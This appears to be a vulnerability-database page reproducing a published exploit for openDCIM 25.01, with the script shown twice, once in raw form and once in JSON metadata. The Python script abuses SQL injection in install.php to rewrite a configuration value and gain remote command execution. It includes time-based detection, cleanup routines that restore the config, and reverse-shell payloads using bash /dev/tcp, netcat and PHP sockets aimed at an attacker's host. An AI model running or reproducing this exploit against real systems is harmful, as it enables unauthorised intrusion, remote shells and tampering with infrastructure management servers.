📄 openDCIM 25.01 SQL Injection_PACKETSTORM:219200

Description

openDCIM version 25.01 remote SQL injection exploit that can be leveraged to execute arbitrary code...

Basic Information

ID PACKETSTORM:219200

Published Apr 20, 2026 at 00:00

Affected Product

Affected Versions ==================================================================================================================================
| # Title : openDCIM 25.01 Python Exploit – Authenticated & Time-Based Detection |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits) |
| # Vendor : https://opendcim.org/downloads.html |
==================================================================================================================================

[+] Summary : This Python script is a security exploitation tool targeting a logical SQL Injection vulnerability in openDCIM’s install.php endpoint, which can be escalated to Remote Code Execution (RCE).

[+] POC :

#!/usr/bin/env python3

import sys
import re
import time
import random
import string
import requests
import urllib3
import argparse
from urllib.parse import urljoin
from base64 import b64encode

urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

class Color:
RED = '\033[91m'
GREEN = '\033[92m'
YELLOW = '\033[93m'
BLUE = '\033[94m'
PURPLE = '\033[95m'
CYAN = '\033[96m'
WHITE = '\033[97m'
RESET = '\033[0m'
BOLD = '\033[1m'

def print_success(msg):
print(f"{Color.GREEN}[+]{Color.RESET} {msg}")

def print_error(msg):
print(f"{Color.RED}[-]{Color.RESET} {msg}")

def print_status(msg):
print(f"{Color.BLUE}[*]{Color.RESET} {msg}")

def print_warning(msg):
print(f"{Color.YELLOW}[!]{Color.RESET} {msg}")

class OpenDCIMExploit:
LDAP_FIELDS = [
'LDAPServer', 'LDAPBaseDN', 'LDAPBindDN', 'LDAPSessionExpiration',
'LDAPSiteAccess', 'LDAPReadAccess', 'LDAPWriteAccess', 'LDAPDeleteAccess',
'LDAPAdminOwnDevices', 'LDAPRackRequest', 'LDAPRackAdmin',
'LDAPContactAdmin', 'LDAPSiteAdmin'
]

DOT_PARAM = 'dot'
SQLI_WRAP = ['" WHERE 1=0; ', ' -- ']

def __init__(self, target_url, username, password, verify_ssl=False, timeout=30):
self.target_url = target_url.rstrip('/')
self.username = username
self.password = password
self.verify_ssl = verify_ssl
self.timeout = timeout
self.session = requests.Session()
self.backup_table = None
self.authenticated = False

def _get_install_url(self):
return urljoin(self.target_url, 'install.php')

def _get_report_url(self):
return urljoin(self.target_url, 'report_network_map.php')

def _get_login_url(self):
return urljoin(self.target_url, 'index.php')

def authenticate(self):
print_status(f"Authenticating as {self.username}...")
try:
response = self.session.get(self._get_login_url(), verify=self.verify_ssl, timeout=self.timeout)

csrf_token = None
csrf_match = re.search(r'name="csrf_token"\s+value="([^"]+)"', response.text)
if csrf_match:
csrf_token = csrf_match.group(1)

login_data = {
'user_login': self.username,
'user_password': self.password,
'submit': 'Login'
}

if csrf_token:
login_data['csrf_token'] = csrf_token

response = self.session.post(
self._get_login_url(),
data=login_data,
verify=self.verify_ssl,
timeout=self.timeout,
allow_redirects=True
)

if 'logout' in response.text.lower() or 'dashboard' in response.text.lower():
print_success("Authentication successful")
self.authenticated = True
return True
else:
print_warning("Authentication may have failed, but continuing anyway...")
return False

except Exception as e:
print_warning(f"Authentication error: {e}")
return False

def _inject_sql(self, field, sql_query):
form_data = {'ldapaction': 'Set'}
for field_name in self.LDAP_FIELDS:
form_data[field_name] = ''

form_data[field] = f"{self.SQLI_WRAP[0]}{sql_query}{self.SQLI_WRAP[1]}"

try:
response = self.session.post(
self._get_install_url(),
data=form_data,
verify=self.verify_ssl,
timeout=self.timeout,
allow_redirects=True
)
return response.status_code in [200, 302]

except Exception as e:
print_error(f"SQL injection failed: {e}")
return False

def check_vulnerability(self):
print_status("Checking if target is vulnerable...")

try:
response = self.session.get(self._get_install_url(), verify=self.verify_ssl, timeout=self.timeout)

if response.status_code not in [200, 302]:
print_error(f"install.php returned status {response.status_code}")
return False

body = response.text
if not any(k in body for k in ['ldapaction', 'openDCIM', 'Upgrade']):
print_warning("install.php doesn't look like openDCIM")
return False

except Exception as e:
print_error(f"Failed to access install.php: {e}")
return False

print_success("install.php is accessible")
print_status("Testing time-based SQL injection...")

success = 0

for i in range(3):
sleep_time = random.randint(1, 3)
start = time.time()

self._inject_sql(
random.choice(self.LDAP_FIELDS),
f"SELECT SLEEP({sleep_time})"
)

elapsed = time.time() - start

if elapsed >= sleep_time:
success += 1
print_success(f"Delay detected ({elapsed:.1f}s)")
else:
print_warning(f"No delay detected ({elapsed:.1f}s)")

return success == 3

def backup_config(self):
self.backup_table = ''.join(random.choices(string.ascii_lowercase, k=8))
print_status(f"Creating backup table: {self.backup_table}")

sql = (
f"DROP TABLE IF EXISTS {self.backup_table}; "
f"CREATE TABLE {self.backup_table} AS "
f"SELECT Parameter, Value FROM fac_Config "
f"WHERE Parameter LIKE 'LDAP%' OR Parameter = '{self.DOT_PARAM}'"
)

return self._inject_sql('LDAPServer', sql)

def poison_dot(self, command):
escaped = command.replace('\\', '\\\\')
print_status(f"Poisoning dot parameter...")

sql = f"UPDATE fac_Config SET Value = '{escaped}' WHERE Parameter = '{self.DOT_PARAM}'"
return self._inject_sql('LDAPBaseDN', sql)

def restore_config(self):
if not self.backup_table:
return False

print_status("Restoring configuration...")

sql = (
f"UPDATE fac_Config c INNER JOIN {self.backup_table} b "
f"ON c.Parameter = b.Parameter SET c.Value = b.Value; "
f"DROP TABLE IF EXISTS {self.backup_table}"
)

return self._inject_sql('LDAPSiteAdmin', sql)

def trigger_execution(self):
try:
r = self.session.get(self._get_report_url(),
params={'format': '0', 'containerid': '1'},
verify=self.verify_ssl,
timeout=self.timeout)
return r.text.strip()
except:
return None

def execute_command(self, command):
print_status(f"Executing: {command}")

if not self.backup_config():
return None

if not self.poison_dot(command + " #"):
self.restore_config()
return None

output = self.trigger_execution()
self.restore_config()

return output

def reverse_shell(self, lhost, lport, shell_type='bash'):

payloads = {
'bash': f"bash -i >& /dev/tcp/{lhost}/{lport} 0>&1",
'nc': f"nc -e /bin/sh {lhost} {lport}",
'python': f"python3 -c 'import socket,subprocess,os; ...'",
'php': f"php -r '$sock=fsockopen(\"{lhost}\",{lport});exec(\"/bin/sh -i <&3 >&3 2>&3\");'"
}

if shell_type not in payloads:
return False

print_status(f"Reverse shell: {lhost}:{lport}")

print_warning(f"Make sure listener is running (nc -lvnp {lport})")

self.execute_command(payloads[shell_type])
return True

def main():
parser = argparse.ArgumentParser()

parser.add_argument('target')
parser.add_argument('username')
parser.add_argument('password')
parser.add_argument('command', nargs='?', default='id')

args = parser.parse_args()

print("=" * 60)
print("openDCIM SQLi RCE Exploit")
print("=" * 60)

exploit = OpenDCIMExploit(args.target, args.username, args.password)

exploit.authenticate()

if not exploit.check_vulnerability():
print_error("Not vulnerable")
sys.exit(1)

output = exploit.execute_command(args.command)

if output:
print("\n[OUTPUT]\n", output)

if __name__ == "__main__":
main()

Greetings to :==============================================================================
jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
============================================================================================

{
    "lastseen": "2026-04-20T15:50:29",
    "description": "openDCIM version 25.01 remote SQL injection exploit that can be leveraged to execute arbitrary code...",
    "published": "2026-04-20T00:00:00",
    "modified": "2026-04-20T00:00:00",
    "type": "packetstorm",
    "title": "\ud83d\udcc4 openDCIM 25.01 SQL Injection",
    "source": "",
    "references": "",
    "id": "PACKETSTORM:219200",
    "bulletinFamily": "exploit",
    "cwe": null,
    "cvelist": [],
    "sourceData": "==================================================================================================================================\n    | # Title     : openDCIM 25.01 Python Exploit \u2013 Authenticated & Time-Based Detection                                             |\n    | # Author    : indoushka                                                                                                        |\n    | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits)                                                 |\n    | # Vendor    : https://opendcim.org/downloads.html                                                                              |\n    ==================================================================================================================================\n    \n    [+] Summary    : This Python script is a security exploitation tool targeting a logical SQL Injection vulnerability in openDCIM\u2019s install.php endpoint, which can be escalated to Remote Code Execution (RCE).\n    \n    [+] POC   :  \n    \n    #!/usr/bin/env python3\n    \n    import sys\n    import re\n    import time\n    import random\n    import string\n    import requests\n    import urllib3\n    import argparse\n    from urllib.parse import urljoin\n    from base64 import b64encode\n    \n    urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)\n    \n    \n    class Color:\n        RED = '\\033[91m'\n        GREEN = '\\033[92m'\n        YELLOW = '\\033[93m'\n        BLUE = '\\033[94m'\n        PURPLE = '\\033[95m'\n        CYAN = '\\033[96m'\n        WHITE = '\\033[97m'\n        RESET = '\\033[0m'\n        BOLD = '\\033[1m'\n    \n    \n    def print_success(msg):\n        print(f\"{Color.GREEN}[+]{Color.RESET} {msg}\")\n    \n    \n    def print_error(msg):\n        print(f\"{Color.RED}[-]{Color.RESET} {msg}\")\n    \n    \n    def print_status(msg):\n        print(f\"{Color.BLUE}[*]{Color.RESET} {msg}\")\n    \n    \n    def print_warning(msg):\n        print(f\"{Color.YELLOW}[!]{Color.RESET} {msg}\")\n    \n    \n    class OpenDCIMExploit:\n        LDAP_FIELDS = [\n            'LDAPServer', 'LDAPBaseDN', 'LDAPBindDN', 'LDAPSessionExpiration',\n            'LDAPSiteAccess', 'LDAPReadAccess', 'LDAPWriteAccess', 'LDAPDeleteAccess',\n            'LDAPAdminOwnDevices', 'LDAPRackRequest', 'LDAPRackAdmin',\n            'LDAPContactAdmin', 'LDAPSiteAdmin'\n        ]\n    \n        DOT_PARAM = 'dot'\n        SQLI_WRAP = ['\" WHERE 1=0; ', ' -- ']\n    \n        def __init__(self, target_url, username, password, verify_ssl=False, timeout=30):\n            self.target_url = target_url.rstrip('/')\n            self.username = username\n            self.password = password\n            self.verify_ssl = verify_ssl\n            self.timeout = timeout\n            self.session = requests.Session()\n            self.backup_table = None\n            self.authenticated = False\n    \n        def _get_install_url(self):\n            return urljoin(self.target_url, 'install.php')\n    \n        def _get_report_url(self):\n            return urljoin(self.target_url, 'report_network_map.php')\n    \n        def _get_login_url(self):\n            return urljoin(self.target_url, 'index.php')\n    \n        def authenticate(self):\n            print_status(f\"Authenticating as {self.username}...\")\n            try:\n                response = self.session.get(self._get_login_url(), verify=self.verify_ssl, timeout=self.timeout)\n    \n                csrf_token = None\n                csrf_match = re.search(r'name=\"csrf_token\"\\s+value=\"([^\"]+)\"', response.text)\n                if csrf_match:\n                    csrf_token = csrf_match.group(1)\n    \n                login_data = {\n                    'user_login': self.username,\n                    'user_password': self.password,\n                    'submit': 'Login'\n                }\n    \n                if csrf_token:\n                    login_data['csrf_token'] = csrf_token\n    \n                response = self.session.post(\n                    self._get_login_url(),\n                    data=login_data,\n                    verify=self.verify_ssl,\n                    timeout=self.timeout,\n                    allow_redirects=True\n                )\n    \n                if 'logout' in response.text.lower() or 'dashboard' in response.text.lower():\n                    print_success(\"Authentication successful\")\n                    self.authenticated = True\n                    return True\n                else:\n                    print_warning(\"Authentication may have failed, but continuing anyway...\")\n                    return False\n    \n            except Exception as e:\n                print_warning(f\"Authentication error: {e}\")\n                return False\n    \n        def _inject_sql(self, field, sql_query):\n            form_data = {'ldapaction': 'Set'}\n            for field_name in self.LDAP_FIELDS:\n                form_data[field_name] = ''\n    \n            form_data[field] = f\"{self.SQLI_WRAP[0]}{sql_query}{self.SQLI_WRAP[1]}\"\n    \n            try:\n                response = self.session.post(\n                    self._get_install_url(),\n                    data=form_data,\n                    verify=self.verify_ssl,\n                    timeout=self.timeout,\n                    allow_redirects=True\n                )\n                return response.status_code in [200, 302]\n    \n            except Exception as e:\n                print_error(f\"SQL injection failed: {e}\")\n                return False\n    \n        def check_vulnerability(self):\n            print_status(\"Checking if target is vulnerable...\")\n    \n            try:\n                response = self.session.get(self._get_install_url(), verify=self.verify_ssl, timeout=self.timeout)\n    \n                if response.status_code not in [200, 302]:\n                    print_error(f\"install.php returned status {response.status_code}\")\n                    return False\n    \n                body = response.text\n                if not any(k in body for k in ['ldapaction', 'openDCIM', 'Upgrade']):\n                    print_warning(\"install.php doesn't look like openDCIM\")\n                    return False\n    \n            except Exception as e:\n                print_error(f\"Failed to access install.php: {e}\")\n                return False\n    \n            print_success(\"install.php is accessible\")\n            print_status(\"Testing time-based SQL injection...\")\n    \n            success = 0\n    \n            for i in range(3):\n                sleep_time = random.randint(1, 3)\n                start = time.time()\n    \n                self._inject_sql(\n                    random.choice(self.LDAP_FIELDS),\n                    f\"SELECT SLEEP({sleep_time})\"\n                )\n    \n                elapsed = time.time() - start\n    \n                if elapsed >= sleep_time:\n                    success += 1\n                    print_success(f\"Delay detected ({elapsed:.1f}s)\")\n                else:\n                    print_warning(f\"No delay detected ({elapsed:.1f}s)\")\n    \n            return success == 3\n    \n        def backup_config(self):\n            self.backup_table = ''.join(random.choices(string.ascii_lowercase, k=8))\n            print_status(f\"Creating backup table: {self.backup_table}\")\n    \n            sql = (\n                f\"DROP TABLE IF EXISTS {self.backup_table}; \"\n                f\"CREATE TABLE {self.backup_table} AS \"\n                f\"SELECT Parameter, Value FROM fac_Config \"\n                f\"WHERE Parameter LIKE 'LDAP%' OR Parameter = '{self.DOT_PARAM}'\"\n            )\n    \n            return self._inject_sql('LDAPServer', sql)\n    \n        def poison_dot(self, command):\n            escaped = command.replace('\\\\', '\\\\\\\\')\n            print_status(f\"Poisoning dot parameter...\")\n    \n            sql = f\"UPDATE fac_Config SET Value = '{escaped}' WHERE Parameter = '{self.DOT_PARAM}'\"\n            return self._inject_sql('LDAPBaseDN', sql)\n    \n        def restore_config(self):\n            if not self.backup_table:\n                return False\n    \n            print_status(\"Restoring configuration...\")\n    \n            sql = (\n                f\"UPDATE fac_Config c INNER JOIN {self.backup_table} b \"\n                f\"ON c.Parameter = b.Parameter SET c.Value = b.Value; \"\n                f\"DROP TABLE IF EXISTS {self.backup_table}\"\n            )\n    \n            return self._inject_sql('LDAPSiteAdmin', sql)\n    \n        def trigger_execution(self):\n            try:\n                r = self.session.get(self._get_report_url(),\n                                      params={'format': '0', 'containerid': '1'},\n                                      verify=self.verify_ssl,\n                                      timeout=self.timeout)\n                return r.text.strip()\n            except:\n                return None\n    \n        def execute_command(self, command):\n            print_status(f\"Executing: {command}\")\n    \n            if not self.backup_config():\n                return None\n    \n            if not self.poison_dot(command + \" #\"):\n                self.restore_config()\n                return None\n    \n            output = self.trigger_execution()\n            self.restore_config()\n    \n            return output\n    \n        def reverse_shell(self, lhost, lport, shell_type='bash'):\n    \n            payloads = {\n                'bash': f\"bash -i >& /dev/tcp/{lhost}/{lport} 0>&1\",\n                'nc': f\"nc -e /bin/sh {lhost} {lport}\",\n                'python': f\"python3 -c 'import socket,subprocess,os; ...'\",\n                'php': f\"php -r '$sock=fsockopen(\\\"{lhost}\\\",{lport});exec(\\\"/bin/sh -i <&3 >&3 2>&3\\\");'\"\n            }\n    \n            if shell_type not in payloads:\n                return False\n    \n            print_status(f\"Reverse shell: {lhost}:{lport}\")\n    \n            print_warning(f\"Make sure listener is running (nc -lvnp {lport})\")\n    \n            self.execute_command(payloads[shell_type])\n            return True\n    \n    \n    def main():\n        parser = argparse.ArgumentParser()\n    \n        parser.add_argument('target')\n        parser.add_argument('username')\n        parser.add_argument('password')\n        parser.add_argument('command', nargs='?', default='id')\n    \n        args = parser.parse_args()\n    \n        print(\"=\" * 60)\n        print(\"openDCIM SQLi RCE Exploit\")\n        print(\"=\" * 60)\n    \n        exploit = OpenDCIMExploit(args.target, args.username, args.password)\n    \n        exploit.authenticate()\n    \n        if not exploit.check_vulnerability():\n            print_error(\"Not vulnerable\")\n            sys.exit(1)\n    \n        output = exploit.execute_command(args.command)\n    \n        if output:\n            print(\"\\n[OUTPUT]\\n\", output)\n    \n    \n    if __name__ == \"__main__\":\n        main()\n    \t\n    Greetings to :==============================================================================\n    jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|\n    ============================================================================================",
    "sourceHref": "https://packetstorm.news/download/219200",
    "cvss": {
        "score": 0,
        "severity": "NONE",
        "vector": "NONE",
        "version": "NONE"
    },
    "cvss2": [],
    "cvss3": {
        "version": "",
        "vectorString": "",
        "baseScore": 0,
        "baseSeverity": "",
        "attackVector": "",
        "attackComplexity": "",
        "privilegesRequired": "",
        "userInteraction": "",
        "scope": "",
        "confidentialityImpact": "",
        "integrityImpact": "",
        "availabilityImpact": "",
        "cvssV3": {
            "version": "",
            "vectorString": "",
            "baseScore": 0,
            "baseSeverity": "",
            "attackVector": "",
            "attackComplexity": "",
            "privilegesRequired": "",
            "userInteraction": "",
            "scope": "",
            "confidentialityImpact": "",
            "integrityImpact": "",
            "availabilityImpact": ""
        }
    },
    "href": "https://packetstorm.news/files/id/219200/",
    "category_name": "Exploit",
    "post_link": "",
    "product": "",
    "version": "",
    "vendor": "",
    "ai_description": "",
    "ai_severity": "",
    "ai_vendor": "",
    "ai_product": "",
    "ai_version": "",
    "ai_score": 0
}

Description

Basic Information

Affected Product

💭 Join the Security Discussion ❌ Cancel Reply